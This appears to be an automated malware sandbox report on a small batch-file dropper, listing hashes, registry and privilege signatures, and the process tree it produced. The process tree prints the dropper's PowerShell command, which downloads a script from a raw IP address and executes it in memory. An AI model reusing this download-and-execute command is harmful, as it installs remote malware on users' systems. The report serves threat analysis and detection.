Analysis
- max time kernel: 105s
- max time network: 151s
- platform: windows10_x64
- resource: win10v191014
- submitted: 11-02-2020 18:10
Static task: static1
Behavioral task: behavioral1
- Sample: 61qVyZCf.bat
- Resource: win7v191014 (windows7_x64)
- 0 signatures, 0 seconds
Behavioral task: behavioral2
- Sample: 61qVyZCf.bat
- Resource: win10v191014 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: 61qVyZCf.bat
- Size: 189B
- MD5: b333d94ab42b4326dd0fd88ed1478a68
- SHA1: 25f722c04783237a8195b64d6c08ea787991c6eb
- SHA256: ece31cd5ba841084557b618766ee4ec4e36796d0ece6191574a8eb615e01e909
- SHA512: 1cfd9d628a71c3a6558ba135ad295db79c8dec2bbbc438a6a8a0c2cae5465aaa74fccfcc14a1b62cc17f443f6400750a4eba200e2b2ce170a031941b412be2b0
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source: ps1.dropper
- URLs: http://185.103.242.78/pastes/61qVyZCf
Signatures
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: WerFault.exe
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
- Enumerates system info in registry (2 TTPs, 2 IoCs)
  Processes: WerFault.exe
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
- Program crash (1 IoC)
  Processes: WerFault.exe
  pid | process
  4292 | WerFault.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes: WerFault.exe
  description | pid | process
  Token: SeRestorePrivilege | 4292 | WerFault.exe
  Token: SeBackupPrivilege | 4292 | WerFault.exe
  Token: SeDebugPrivilege | 4292 | WerFault.exe
- Suspicious behavior: EnumeratesProcesses (17 IoCs)
  Processes: WerFault.exe
  pid | process
  4292 | WerFault.exe (all 17 IoCs from this one process)
Processes
- C:\Windows\system32\cmd.exe (PID 5008, depth 1)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\61qVyZCf.bat"
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 5052, depth 2)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/61qVyZCf');Invoke-IGMVZY;Start-Sleep -s 10000"
    - C:\Windows\SysWOW64\WerFault.exe (PID 4292, depth 3)
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 704
      Signatures triggered:
      - Checks processor information in registry
      - Enumerates system info in registry
      - Program crash
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
- \??\c:\windows\system32\taskhostw.exe (PID 3904, depth 1)
  Command line: taskhostw.exe -RegisterDevice -SettingChange -Full